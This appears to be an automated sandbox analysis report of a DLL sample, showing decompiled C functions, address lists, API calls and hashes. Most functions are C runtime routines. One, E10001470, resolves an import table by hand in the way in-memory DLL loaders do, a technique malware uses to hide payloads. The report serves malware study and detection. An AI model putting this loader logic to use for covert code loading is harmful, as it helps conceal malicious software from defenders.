                                                      0x1000c53d
                                                      0x1000c53e
                                                      0x1000c547
                                                      0x1000c592
                                                      0x1000c595
                                                      0x1000c598
                                                      0x1000c5bf
                                                      0x1000c5bf
                                                      0x1000c5c2
                                                      0x1000c5cf
                                                      0x1000c5c4
                                                      0x1000c5c4
                                                      0x1000c5c4
                                                      0x1000c5c4
                                                      0x1000c5c4
                                                      0x00000000
                                                      0x1000c5c4
                                                      0x1000c5c2
                                                      0x1000c53a
                                                      0x1000c4c4
                                                      0x1000c4c4
                                                      0x1000c4c7
                                                      0x1000c4ca
                                                      0x1000c54e
                                                      0x1000c5c8
                                                      0x1000c5c8
                                                      0x1000c4cc
                                                      0x1000c4cf
                                                      0x1000c4cf
                                                      0x1000c4d2
                                                      0x1000c4d4
                                                      0x00000000
                                                      0x1000c4d4
                                                      0x1000c4ca
                                                      0x1000c4a3
                                                      0x1000c4a8
                                                      0x00000000
                                                      0x1000c4a8
                                                      0x1000c491
                                                      0x1000c496
                                                      0x1000c4ae
                                                      0x1000c4ae
                                                      0x1000c4b2
                                                      0x1000c4b2
                                                      0x1000c5d6
                                                      0x1000c476
                                                      0x1000c47a
                                                      0x1000c47a

                                                      APIs
                                                      • __ioinit.LIBCMT ref: 1000C46D
                                                        • Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: Once$ExecuteInit__ioinit
                                                      • String ID:
                                                      • API String ID: 129814473-0
                                                      • Opcode ID: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
                                                      • Instruction ID: 4d06972f43a844bfa3949195b83d417bb95582cf177f034ad1b947d460bfdcb6
                                                      • Opcode Fuzzy Hash: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
                                                      • Instruction Fuzzy Hash: B641E175500B099BF724CB68CC91E6A77E4EF453E1F10861DE8A6876D9E774FD808B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 10005033, Relevance: 9.1, APIs: 6, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 89%
                                                      			E10005033(void* __eflags, signed char _a4, intOrPtr* _a8) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				signed int _t44;
				signed int _t45;
				signed int _t48;
				signed int _t52;
				void* _t60;
				signed int _t62;
				void* _t64;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				void* _t77;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;
				intOrPtr* _t92;

				_t44 = E100076DE(_t43);
				if(_t44 >= 0) {
					_t92 = _a8;
					_t45 = E100095F8(_t92);
					_t2 = _t92 + 0xc; // 0x66ce7cf0
					_t74 =  *_t2;
					_t89 = _t45;
					__eflags = _t74 & 0x00000082;
					if((_t74 & 0x00000082) != 0) {
						__eflags = _t74 & 0x00000040;
						if((_t74 & 0x00000040) == 0) {
							_t70 = 0;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								L10:
								_t16 = _t92 + 0xc; // 0x66ce7cf0
								_t48 =  *_t16 & 0xffffffef | 0x00000002;
								 *(_t92 + 0xc) = _t48;
								 *(_t92 + 4) = _t70;
								__eflags = _t48 & 0x0000010c;
								if((_t48 & 0x0000010c) == 0) {
									_t60 = E1000951C();
									__eflags = _t92 - _t60 + 0x20;
									if(_t92 == _t60 + 0x20) {
										L13:
										_t62 = E1000961C(_t89);
										__eflags = _t62;
										if(_t62 == 0) {
											goto L14;
										}
									} else {
										_t64 = E1000951C();
										__eflags = _t92 - _t64 + 0x40;
										if(_t92 != _t64 + 0x40) {
											L14:
											E1000A133(_t92);
										} else {
											goto L13;
										}
									}
								}
								__eflags =  *(_t92 + 0xc) & 0x00000108;
								if(( *(_t92 + 0xc) & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_v8 = 1;
									_push( &_a4);
									_push(_t89);
									_t45 = E10009680(_t70, _t86, _t89, _t92, 1);
									_t70 = _t45;
									goto L27;
								} else {
									_t24 = _t92 + 8; // 0x753b46c6
									_t87 =  *_t24;
									_t25 = _t87 + 1; // 0x753b46c7
									 *_t92 = _t25;
									_t26 = _t92 + 0x18; // 0x8b0d78fe
									_t76 =  *_t92 - _t87;
									_v8 = _t76;
									 *(_t92 + 4) =  *_t26 - 1;
									__eflags = _t76;
									if(__eflags <= 0) {
										__eflags = _t89 - 0xffffffff;
										if(_t89 == 0xffffffff) {
											L22:
											_t77 = 0x10012340;
										} else {
											__eflags = _t89 - 0xfffffffe;
											if(_t89 == 0xfffffffe) {
												goto L22;
											} else {
												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t89 >> 5) * 4));
											}
										}
										__eflags =  *(_t77 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t70);
											_push(_t70);
											_push(_t89);
											_t45 = E10009FB9(_t70, _t89, _t92, __eflags) & _t87;
											__eflags = _t45 - 0xffffffff;
											if(_t45 == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t76);
										_push(_t87);
										_push(_t89);
										_t70 = E10009680(_t70, _t87, _t89, _t92, __eflags);
										L25:
										_t35 = _t92 + 8; // 0x753b46c6
										_t45 = _a4;
										 *( *_t35) = _t45;
										L27:
										__eflags = _t70 - _v8;
										if(_t70 == _v8) {
											_t52 = _a4 & 0x000000ff;
										} else {
											L28:
											_t40 = _t92 + 0xc;
											 *_t40 =  *(_t92 + 0xc) | 0x00000020;
											__eflags =  *_t40;
											goto L29;
										}
									}
								}
							} else {
								 *(_t92 + 4) = 0;
								__eflags = _t74 & 0x00000010;
								if((_t74 & 0x00000010) == 0) {
									 *(_t92 + 0xc) = _t74 | 0x00000020;
									L29:
									_t52 = _t45 | 0xffffffff;
								} else {
									_t14 = _t92 + 8; // 0x753b46c6
									_t85 = _t74 & 0xfffffffe;
									__eflags = _t85;
									 *_t92 =  *_t14;
									 *(_t92 + 0xc) = _t85;
									goto L10;
								}
							}
						} else {
							_t67 = E10005EC6();
							 *_t67 = 0x22;
							goto L6;
						}
					} else {
						_t67 = E10005EC6();
						 *_t67 = 9;
						L6:
						 *(_t92 + 0xc) =  *(_t92 + 0xc) | 0x00000020;
						_t52 = _t67 | 0xffffffff;
					}
					return _t52;
				} else {
					return _t44 | 0xffffffff;
				}
			}


























                                                      0x10005037
                                                      0x1000503e
                                                      0x10005046
                                                      0x1000504b
                                                      0x10005051
                                                      0x10005051
                                                      0x10005054
                                                      0x10005056
                                                      0x10005059
                                                      0x10005068
                                                      0x1000506b
                                                      0x10005085
                                                      0x10005087
                                                      0x1000508a
                                                      0x1000509f
                                                      0x1000509f
                                                      0x100050a5
                                                      0x100050a8
                                                      0x100050ab
                                                      0x100050ae
                                                      0x100050b3
                                                      0x100050b5
                                                      0x100050bd
                                                      0x100050bf
                                                      0x100050cd
                                                      0x100050ce
                                                      0x100050d4
                                                      0x100050d6
                                                      0x00000000
                                                      0x00000000
                                                      0x100050c1
                                                      0x100050c1
                                                      0x100050c9
                                                      0x100050cb
                                                      0x100050d8
                                                      0x100050d9
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x100050cb
                                                      0x100050bf
                                                      0x100050df
                                                      0x100050e6
                                                      0x10005164
                                                      0x10005165
                                                      0x10005166
                                                      0x1000516c
                                                      0x1000516d
                                                      0x1000516e
                                                      0x10005176
                                                      0x00000000
                                                      0x100050e8
                                                      0x100050e8
                                                      0x100050e8
                                                      0x100050ed
                                                      0x100050f0
                                                      0x100050f2
                                                      0x100050f5
                                                      0x100050f8
                                                      0x100050fb
                                                      0x100050fe
                                                      0x10005100
                                                      0x10005119
                                                      0x1000511c
                                                      0x10005139
                                                      0x10005139
                                                      0x1000511e
                                                      0x1000511e
                                                      0x10005121
                                                      0x00000000
                                                      0x10005123
                                                      0x10005130
                                                      0x10005130
                                                      0x10005121
                                                      0x1000513e
                                                      0x10005142
                                                      0x00000000
                                                      0x10005144
                                                      0x10005144
                                                      0x10005146
                                                      0x10005147
                                                      0x10005148
                                                      0x1000514e
                                                      0x10005153
                                                      0x10005156
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x10005156
                                                      0x10005102
                                                      0x10005102
                                                      0x10005103
                                                      0x10005104
                                                      0x1000510d
                                                      0x10005158
                                                      0x10005158
                                                      0x1000515b
                                                      0x1000515e
                                                      0x10005178
                                                      0x10005178
                                                      0x1000517b
                                                      0x10005186
                                                      0x1000517d
                                                      0x1000517d
                                                      0x1000517d
                                                      0x1000517d
                                                      0x1000517d
                                                      0x00000000
                                                      0x1000517d
                                                      0x1000517b
                                                      0x10005100
                                                      0x1000508c
                                                      0x1000508c
                                                      0x1000508f
                                                      0x10005092
                                                      0x10005114
                                                      0x10005181
                                                      0x10005181
                                                      0x10005094
                                                      0x10005094
                                                      0x10005097
                                                      0x10005097
                                                      0x1000509a
                                                      0x1000509c
                                                      0x00000000
                                                      0x1000509c
                                                      0x10005092
                                                      0x1000506d
                                                      0x1000506d
                                                      0x10005072
                                                      0x00000000
                                                      0x10005072
                                                      0x1000505b
                                                      0x1000505b
                                                      0x10005060
                                                      0x10005078
                                                      0x10005078
                                                      0x1000507c
                                                      0x1000507c
                                                      0x1000518e
                                                      0x10005040
                                                      0x10005044
                                                      0x10005044

                                                      APIs
                                                      • __ioinit.LIBCMT ref: 10005037
                                                        • Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: Once$ExecuteInit__ioinit
                                                      • String ID:
                                                      • API String ID: 129814473-0
                                                      • Opcode ID: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
                                                      • Instruction ID: 32086827ce60b9a2cbb99d25a0e80922b058c4e771a23cab2cd98d30bef894a1
                                                      • Opcode Fuzzy Hash: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
                                                      • Instruction Fuzzy Hash: 4A41F171900B059FF324CF68C851BAB77E4DF453E2B10871DE8B6C62D9E676E9408B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 10004A66, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 90%
                                                      			E10004A66(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				char* _v16;
				char _v28;
				signed char _v32;
				void* _t10;
				void* _t19;
				intOrPtr* _t22;
				void* _t24;
				void* _t25;
				intOrPtr* _t27;

				_t25 = __edi;
				_t24 = __edx;
				_t19 = __ebx;
				while(1) {
					_t10 = E10008E67(_t19, _t24, _t25, _a4);
					if(_t10 != 0) {
						break;
					}
					if(E10009026(_t10, _a4) == 0) {
						_push(1);
						_t22 =  &_v28;
						_v16 = "bad allocation";
						E10008F1E(_t22,  &_v16);
						_v28 = 0x1000e460;
						E10009059( &_v28, 0x10010b04);
						asm("int3");
						_t27 = _t22;
						 *_t27 = 0x1000e460;
						E10008F5C(_t22);
						if((_v32 & 0x00000001) != 0) {
							L10003800(_t27);
						}
						return _t27;
					} else {
						continue;
					}
					L7:
				}
				return _t10;
				goto L7;
			}












                                                      0x10004a66
                                                      0x10004a66
                                                      0x10004a66
                                                      0x10004a7b
                                                      0x10004a7e
                                                      0x10004a86
                                                      0x00000000
                                                      0x00000000
                                                      0x10004a79
                                                      0x10004a8a
                                                      0x10004a90
                                                      0x10004a93
                                                      0x10004a9a
                                                      0x10004aa8
                                                      0x10004aaf
                                                      0x10004ab4
                                                      0x10004ab9
                                                      0x10004abb
                                                      0x10004ac1
                                                      0x10004aca
                                                      0x10004acd
                                                      0x10004ad2
                                                      0x10004ad7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x10004a79
                                                      0x10004a89
                                                      0x00000000

                                                      APIs
                                                      • _malloc.LIBCMT ref: 10004A7E
                                                        • Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
                                                        • Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
                                                        • Part of subcall function 10008E67: HeapAlloc.KERNEL32(00640000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA
                                                      • std::exception::exception.LIBCMT ref: 10004A9A
                                                      • __CxxThrowException@8.LIBCMT ref: 10004AAF
                                                        • Part of subcall function 10009059: RaiseException.KERNEL32(?,?,?,10010B04,?,?,?,10004AB4,?,10010B04,00000000,00000001), ref: 100090AA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                      • String ID: `$h
                                                      • API String ID: 1059622496-773005782
                                                      • Opcode ID: 8198483a73eec0a2752513ca626908b84cd43bbea8819fe80895fe02013f144e
                                                      • Instruction ID: ad3e8221741d280e2df0066782729e531edcb1fd3c4a4238d597797a5e5b62a6
                                                      • Opcode Fuzzy Hash: 8198483a73eec0a2752513ca626908b84cd43bbea8819fe80895fe02013f144e
                                                      • Instruction Fuzzy Hash: C2F028B550024D6AFB00DBA8DC01ADF77ACEF023C4F114426F900A2149CFB1AA4087AA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 1000B39B, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 95%
                                                      			E1000B39B(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x100132fc, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x10013c2c == _t7) {
									_t9 = E10005EC6();
									 *_t9 = E10005ED9(GetLastError());
									goto L17;
								} else {
									if(E10009026(_t7, _t31) == 0) {
										_t12 = E10005EC6();
										 *_t12 = E10005ED9(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E10009026(_t6, _t31);
						 *((intOrPtr*)(E10005EC6())) = 0xc;
						goto L12;
					} else {
						E10004732(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E10008E67(__ebx, __edx, __edi, _a8);
				}
			}









                                                      0x1000b3a2
                                                      0x1000b3b0
                                                      0x1000b3b5
                                                      0x1000b3c4
                                                      0x1000b3f7
                                                      0x1000b3c9
                                                      0x1000b3cb
                                                      0x1000b3cb
                                                      0x1000b3d8
                                                      0x1000b3de
                                                      0x1000b3e2
                                                      0x1000b442
                                                      0x1000b442
                                                      0x1000b3e4
                                                      0x1000b3ea
                                                      0x1000b42c
                                                      0x1000b440
                                                      0x00000000
                                                      0x1000b3ec
                                                      0x1000b3f5
                                                      0x1000b414
                                                      0x1000b428
                                                      0x1000b40e
                                                      0x1000b40e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1000b3f5
                                                      0x1000b3ea
                                                      0x00000000
                                                      0x1000b410
                                                      0x1000b3fd
                                                      0x1000b408
                                                      0x00000000
                                                      0x1000b3b7
                                                      0x1000b3ba
                                                      0x1000b3c0
                                                      0x1000b3c0
                                                      0x1000b411
                                                      0x1000b413
                                                      0x1000b3a4
                                                      0x1000b3ae
                                                      0x1000b3ae

                                                      APIs
                                                      • _malloc.LIBCMT ref: 1000B3A7
                                                        • Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
                                                        • Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
                                                        • Part of subcall function 10008E67: HeapAlloc.KERNEL32(00640000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA
                                                      • _free.LIBCMT ref: 1000B3BA
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: AllocHeap_free_malloc
                                                      • String ID:
                                                      • API String ID: 2734353464-0
                                                      • Opcode ID: 1470ddf5c31cb35418e52f366651dade25ef90282a91678f077e8ad7c8708cdc
                                                      • Instruction ID: 18c43e679c10c76ba13cd9b028f176d48a0d2f42c637b465b0a36ca5614664b7
                                                      • Opcode Fuzzy Hash: 1470ddf5c31cb35418e52f366651dade25ef90282a91678f077e8ad7c8708cdc
                                                      • Instruction Fuzzy Hash: AD11E031404616AFFB24EF74DC4564F3BD4DF042E1F218425F9489A15ADB31DE409750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 1000883C, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E1000883C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;

				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0x10010da8);
				E10008040(__ebx, __edi, __esi);
				_t31 = E10006087();
				_t25 =  *0x10012ae4; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E100091AB(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10012394; // 0x10012690
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x10012690;
								if(__eflags != 0) {
									E10004732(_t33);
								}
							}
						}
						_t20 =  *0x10012394; // 0x10012690
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0x10012394; // 0x10012690
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E100088D8();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E1000743E(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E10008085(_t33);
			}









                                                      0x1000883c
                                                      0x1000883c
                                                      0x1000883c
                                                      0x1000883e
                                                      0x10008843
                                                      0x1000884d
                                                      0x1000884f
                                                      0x10008858
                                                      0x10008879
                                                      0x1000887f
                                                      0x10008883
                                                      0x10008886
                                                      0x10008889
                                                      0x1000888f
                                                      0x10008891
                                                      0x10008893
                                                      0x1000889c
                                                      0x1000889e
                                                      0x100088a0
                                                      0x100088a6
                                                      0x100088a9
                                                      0x100088ae
                                                      0x100088a6
                                                      0x1000889e
                                                      0x100088af
                                                      0x100088b4
                                                      0x100088b7
                                                      0x100088bd
                                                      0x100088c1
                                                      0x100088c1
                                                      0x100088c7
                                                      0x100088ce
                                                      0x10008860
                                                      0x10008860
                                                      0x10008860
                                                      0x10008863
                                                      0x10008865
                                                      0x10008869
                                                      0x1000886e
                                                      0x10008876

                                                      APIs
                                                        • Part of subcall function 10006087: __getptd_noexit.LIBCMT ref: 10006088
                                                        • Part of subcall function 10006087: __amsg_exit.LIBCMT ref: 10006095
                                                      • __amsg_exit.LIBCMT ref: 10008869
                                                      • __lock.LIBCMT ref: 10008879
                                                      • InterlockedDecrement.KERNEL32(?), ref: 10008896
                                                      • _free.LIBCMT ref: 100088A9
                                                      • InterlockedIncrement.KERNEL32(10012690), ref: 100088C1
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
                                                      • String ID:
                                                      • API String ID: 1231874560-0
                                                      • Opcode ID: 30cc922b94fd66d93e4772b0e45363f14a3d134312cd16711b26b484a5aab7eb
                                                      • Instruction ID: 6fa5c55f02b032b9b52f9637cbc65706c3d9556ef65a5339b15ab8c9acf7f00e
                                                      • Opcode Fuzzy Hash: 30cc922b94fd66d93e4772b0e45363f14a3d134312cd16711b26b484a5aab7eb
                                                      • Instruction Fuzzy Hash: 7901C075A016219BFB44EB64888578E77A0FF047D4F51800AE9886768CCF38AB91CFD2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 10001470, Relevance: 6.4, APIs: 5, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 48%
                                                      			E10001470(void* __ecx, intOrPtr* _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _t44;
				signed short _t56;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t67;
				intOrPtr* _t68;
				intOrPtr _t70;
				void _t71;
				signed short* _t72;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr* _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				signed short* _t82;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				_t65 =  *_t78;
				_t2 = _t78 + 4; // 0x4d8d5010
				_t79 =  *_t2;
				_a4 = _t79;
				if( *((intOrPtr*)(_t65 + 0x84)) == 0) {
					L22:
					return 1;
				} else {
					_t67 =  *((intOrPtr*)(_t65 + 0x80)) + _t79;
					_v12 = _t67;
					if(IsBadReadPtr(_t67, 0x14) == 0) {
						while(1) {
							_t44 =  *((intOrPtr*)(_t67 + 0xc));
							if(_t44 == 0) {
								goto L22;
							}
							_t8 = _t78 + 0x28; // 0x12f7805
							_t9 = _t78 + 0x1c; // 0xe58b0000
							_t80 =  *((intOrPtr*)( *_t9))(_t44 + _t79,  *_t8);
							_t85 = _t84 + 8;
							_v8 = _t80;
							if(_t80 == 0) {
								SetLastError(0x7e);
								return 0;
							} else {
								_t11 = _t78 + 0xc; // 0xd0ff0000
								_t14 = _t78 + 8; // 0x637e8ef
								_t70 = E10001DD0( *_t14, 4 +  *_t11 * 4);
								_t84 = _t85 + 8;
								if(_t70 == 0) {
									_t40 = _t78 + 0x28; // 0x12f7805
									_t41 = _t78 + 0x24; // 0x39c033cc
									 *((intOrPtr*)( *_t41))(_t80,  *_t40);
									SetLastError(0xe);
									return 0;
								} else {
									_t15 = _t78 + 0xc; // 0xd0ff0000
									 *((intOrPtr*)(_t78 + 8)) = _t70;
									_t77 = _t80;
									 *((intOrPtr*)(_t70 +  *_t15 * 4)) = _t77;
									 *(_t78 + 0xc) =  *(_t78 + 0xc) + 1;
									_t71 =  *_t67;
									if(_t71 == 0) {
										_t82 =  *((intOrPtr*)(_t67 + 0x10)) + _a4;
										_t72 = _t82;
									} else {
										_t64 = _a4;
										_t82 = _t71 + _t64;
										_t72 =  *((intOrPtr*)(_t67 + 0x10)) + _t64;
									}
									_t56 =  *_t82;
									if(_t56 == 0) {
										L17:
										_t67 = _t67 + 0x14;
										_v12 = _t67;
										if(IsBadReadPtr(_t67, 0x14) != 0) {
											goto L22;
										} else {
											_t79 = _a4;
											continue;
										}
									} else {
										_t73 = _t72 - _t82;
										_v16 = _t73;
										while(1) {
											_t27 = _t78 + 0x28; // 0x12f7805
											_push( *_t27);
											_t68 = _t73 + _t82;
											if(_t56 >= 0) {
												_t58 = _t56 + _a4 + 2;
											} else {
												_t58 = _t56 & 0x0000ffff;
											}
											_t30 = _t78 + 0x20; // 0xccccc35d
											_t60 =  *((intOrPtr*)( *_t30))(_t77, _t58);
											_t84 = _t84 + 0xc;
											 *_t68 = _t60;
											if(_t60 == 0) {
												break;
											}
											_t56 = _t82[2];
											_t73 = _v16;
											_t77 = _v8;
											_t82 =  &(_t82[2]);
											if(_t56 != 0) {
												continue;
											} else {
												_t67 = _v12;
												goto L17;
											}
											goto L23;
										}
										_t37 = _t78 + 0x28; // 0x12f7805
										_t39 = _t78 + 0x24; // 0x39c033cc
										 *((intOrPtr*)( *_t39))(_v8,  *_t37);
										SetLastError(0x7f);
										return 0;
									}
								}
							}
							goto L23;
						}
					}
					goto L22;
				}
				L23:
			}

























                                                      0x10001479
                                                      0x1000147c
                                                      0x1000147e
                                                      0x1000147e
                                                      0x10001488
                                                      0x1000148b
                                                      0x100015db
                                                      0x100015e4
                                                      0x10001491
                                                      0x10001497
                                                      0x1000149c
                                                      0x100014a7
                                                      0x100014b0
                                                      0x100014b0
                                                      0x100014b5
                                                      0x00000000
                                                      0x00000000
                                                      0x100014bb
                                                      0x100014c1
                                                      0x100014c6
                                                      0x100014c8
                                                      0x100014cb
                                                      0x100014d0
                                                      0x100015c8
                                                      0x100015d6
                                                      0x100014d6
                                                      0x100014d6
                                                      0x100014e1
                                                      0x100014e9
                                                      0x100014eb
                                                      0x100014f0
                                                      0x100015a7
                                                      0x100015aa
                                                      0x100015ae
                                                      0x100015b5
                                                      0x100015c3
                                                      0x100014f6
                                                      0x100014f6
                                                      0x100014f9
                                                      0x100014fc
                                                      0x100014fe
                                                      0x10001501
                                                      0x10001504
                                                      0x10001508
                                                      0x1000151a
                                                      0x1000151d
                                                      0x1000150a
                                                      0x1000150a
                                                      0x1000150d
                                                      0x10001513
                                                      0x10001513
                                                      0x1000151f
                                                      0x10001523
                                                      0x1000156a
                                                      0x1000156a
                                                      0x10001570
                                                      0x1000157b
                                                      0x00000000
                                                      0x1000157d
                                                      0x1000157d
                                                      0x00000000
                                                      0x1000157d
                                                      0x10001525
                                                      0x10001525
                                                      0x10001527
                                                      0x10001530
                                                      0x10001530
                                                      0x10001530
                                                      0x10001533
                                                      0x10001538
                                                      0x10001545
                                                      0x1000153a
                                                      0x1000153a
                                                      0x1000153a
                                                      0x10001548
                                                      0x1000154c
                                                      0x1000154e
                                                      0x10001551
                                                      0x10001555
                                                      0x00000000
                                                      0x00000000
                                                      0x10001557
                                                      0x1000155a
                                                      0x1000155d
                                                      0x10001560
                                                      0x10001565
                                                      0x00000000
                                                      0x10001567
                                                      0x10001567
                                                      0x00000000
                                                      0x10001567
                                                      0x00000000
                                                      0x10001565
                                                      0x10001585
                                                      0x1000158b
                                                      0x1000158f
                                                      0x10001596
                                                      0x100015a4
                                                      0x100015a4
                                                      0x10001523
                                                      0x100014f0
                                                      0x00000000
                                                      0x100014d0
                                                      0x100014b0
                                                      0x00000000
                                                      0x100014a7
                                                      0x00000000

                                                      APIs
                                                      • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000000,100013CB), ref: 1000149F
                                                      • SetLastError.KERNEL32(0000007E,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100015C8
                                                        • Part of subcall function 10001DD0: VirtualQuery.KERNEL32(0637E8EF,?,0000001C,100013CB,00000000,?,?,?,?,?,100014E9,0637E8EF,D0FF0000), ref: 10001DEA
                                                      • IsBadReadPtr.KERNEL32(?,00000014,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80), ref: 10001573
                                                      • SetLastError.KERNEL32(0000007F), ref: 10001596
